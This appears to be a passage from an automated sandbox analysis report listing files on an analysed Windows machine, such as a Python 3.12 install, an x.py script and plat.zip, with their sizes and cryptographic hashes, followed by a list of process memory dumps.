C:\Users\Admin\Downloads\Python\Python312\tcl\tk8.6\demos\license.terms

Filesize
2KB

MD5
f090d9b312c16489289fd39813412164

SHA1
1bec6668f6549771dadc67d153b89b8f77dcd4b9

SHA256
0d1e4405f6273f091732764ed89b57066be63ce64869be6c71ea337dc4f2f9b5

SHA512
57b323589c5a8d9cbb224416731d8ce65c4b94146df15ce30885df63b1d0b3f709093b65390a911f84f20b7c5de3c0af9b4d7d531742be046eda6e8c3432ef6e

Download Submit
C:\Users\Admin\Downloads\Python\Python312\vcruntime140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\Downloads\Python\Python312\x.py

Filesize
3.9MB

MD5
c714a5475996b806918eebaa65faa591

SHA1
1704b36a8ba096b517e3f2d4fa185a38185f7da9

SHA256
83be34edfc08c0be569ba4c6ced914322cb6689034746bbeb9167dcf717b82fa

SHA512
a8d83582dcb083be92655ffc9e748eb70f48cf84aab809bd9c363fb1b0edcf5ebf7562b2bff7c720e8354d2e3e1f12e6c30bedcb4f29ae362473972cbc6dd011

Download Submit
C:\Users\Admin\Downloads\RE-00019.pdf.download

Filesize
2KB

MD5
bd5ae780a6bb879b6067bffa5154d0ce

SHA1
281c1c66e8b9490325a1d1042356127054289901

SHA256
5fe5416fc79e143e49d7d9e9cac7b177c6f02242b2ca2269053fb3a699b8fe05

SHA512
e086dc66b9ec2b3cc1064a54556182e4e4551a428bcbb49e3ecbdbf1fc6a9a0c5bbaeec712a5edb32b6a81320195610873cde0d0ce3cfe9ee59d75dcaa270540

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 629223.crdownload

Filesize
33KB

MD5
0f9fc9d18797b2b7e6dfa2ccbd4bc107

SHA1
e390b22f79bffc64f8a30e0eca477c08baeea2a1

SHA256
b82272a39fb733c290d54b5f39e9a3fa188472f8c9b1b3d40a815afa0ef32cb1

SHA512
705c07e14b86612d2d6a649f2112940ca075c62c3a83053d25aadb58d6868e89c09ddc5a7fc8e4204a7b99c0bbb0132c3b45eada36edfc06d63280105c53ad29

Download Submit
C:\Users\Admin\Downloads\plat.zip

Filesize
44.0MB

MD5
b89fae5d49909e5aed51e63b5971d3df

SHA1
5cadabd99df94ee4a1a6e743ab55ae15126a31ef

SHA256
4bb6ca3a4f3bd5f2357c983d7f767ee203112765e86ba38b017bb202b74e9853

SHA512
395b26ea9b61fe211b80079de9bfd18a430037a119638c0c1cc9b33b97b7b09bbcb46b5a3cb6479f7aee4209872e78fb03cfd796f1e6df490cb60ce45db5b198

Download Submit
C:\Users\Admin\Downloads\plat\Python\Python312\Lib\test\cjkencodings\shift_jis-utf8.txt

Filesize
1KB

MD5
cc34bcc252d8014250b2fbc0a7880ead

SHA1
89a79425e089c311137adcdcf0a11dfa9d8a4e58

SHA256
a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b

SHA512
c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f

Download Submit
C:\Users\Admin\Downloads\plat\Python\Python312\Lib\test\test_importlib\__init__.py

Filesize
147B

MD5
c3239b95575b0ad63408b8e633f9334d

SHA1
7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc

SHA256
6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225

SHA512
5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25

Download Submit
C:\Users\Admin\Downloads\plat\Python\Python312\Lib\test\test_importlib\builtin\__main__.py

Filesize
62B

MD5
47878c074f37661118db4f3525b2b6cb

SHA1
9671e2ef6e3d9fa96e7450bcee03300f8d395533

SHA256
b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216

SHA512
13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5

Download Submit
C:\Users\Admin\Downloads\plat\Python\Python312\Lib\test\test_importlib\resources\namespacedata01\binary.file

Filesize
4B

MD5
37b59afd592725f9305e484a5d7f5168

SHA1
a02a05b025b928c039cf1ae7e8ee04e7c190c0db

SHA256
054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8

SHA512
4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60

Download Submit
C:\Users\Admin\Downloads\plat\Python\Python312\Lib\test\test_pydoc\__init__.py

Filesize
138B

MD5
4a7dba3770fec2986287b3c790e6ae46

SHA1
8c7a8f21c1bcdb542f4ce798ba7e97f61bee0ea0

SHA256
88db4157a69ee31f959dccbb6fbad3891ba32ad2467fe24858e36c6daccdba4d

SHA512
4596824f4c06b530ef378c88c7b4307b074f922e10e866a1c06d5a86356f88f1dad54c380791d5cfda470918235b6ead9514b49bc99c2371c1b14dc9b6453210

Download Submit
C:\Users\Admin\Downloads\plat\Python\Python312\Scripts\pip3.12.exe

Filesize
105KB

MD5
ece8006a0714b569546a3f789638a55a

SHA1
520ba56fd30bcf1e08eefb390d392905c3470936

SHA256
e9059568c5f1200915f581cf582da6465d68a4b558972c6b5e3501f4aa63de7b

SHA512
bb8926c7938da517104afab2f34c8dfc3bfb8c64241770b6e36f1170b87059d32e9b81b9b0451735718e62be123c27f6a053630c85e1b5b21ede6aca7062fe5c

Download Submit
memory/2980-12209-0x0000023479760000-0x0000023479782000-memory.dmp

Filesize
136KB

Download
memory/3088-23557-0x000002885E260000-0x000002885E270000-memory.dmp

Filesize
64KB

Download
memory/3088-23555-0x000002885C730000-0x000002885C740000-memory.dmp

Filesize
64KB

Download
memory/4580-12276-0x000001FA7E760000-0x000001FA7E772000-memory.dmp

Filesize
72KB

Download
memory/4580-12277-0x000001FA7E740000-0x000001FA7E74A000-memory.dmp

Filesize
40KB

Download
memory/4588-23551-0x0000024EA9460000-0x0000024EA9476000-memory.dmp

Filesize
88KB

Download
memory/4588-23553-0x0000024EAAF90000-0x0000024EAAFA6000-memory.dmp

Filesize
88KB

Download
memory/4588-23938-0x0000024EC4560000-0x0000024EC45DA000-memory.dmp

Filesize
488KB

Download
memory/4588-23580-0x0000024EC3DC0000-0x0000024EC3E36000-memory.dmp

Filesize
472KB

Download
memory/4588-23581-0x0000024EC3E40000-0x0000024EC3FC8000-memory.dmp

Filesize
1.5MB

Download
memory/4588-23582-0x0000024EAB030000-0x0000024EAB04E000-memory.dmp

Filesize
120KB

Download
memory/4588-23587-0x0000024EAB010000-0x0000024EAB01A000-memory.dmp

Filesize
40KB

Download
memory/5552-23559-0x00000188AB9B0000-0x00000188AB9C9000-memory.dmp

Filesize
100KB

Download
memory/5552-23563-0x00000188AD500000-0x00000188AD518000-memory.dmp

Filesize
96KB

Download
memory/6408-23545-0x0000026202560000-0x0000026202570000-memory.dmp

Filesize
64KB

Download
memory/6408-23543-0x0000026200A40000-0x0000026200A50000-memory.dmp

Filesize
64KB

Download
memory/6876-23549-0x0000020B6A490000-0x0000020B6A4A6000-memory.dmp

Filesize
88KB

Download
memory/6876-23547-0x0000020B68940000-0x0000020B68956000-memory.dmp

Filesize
88KB

Download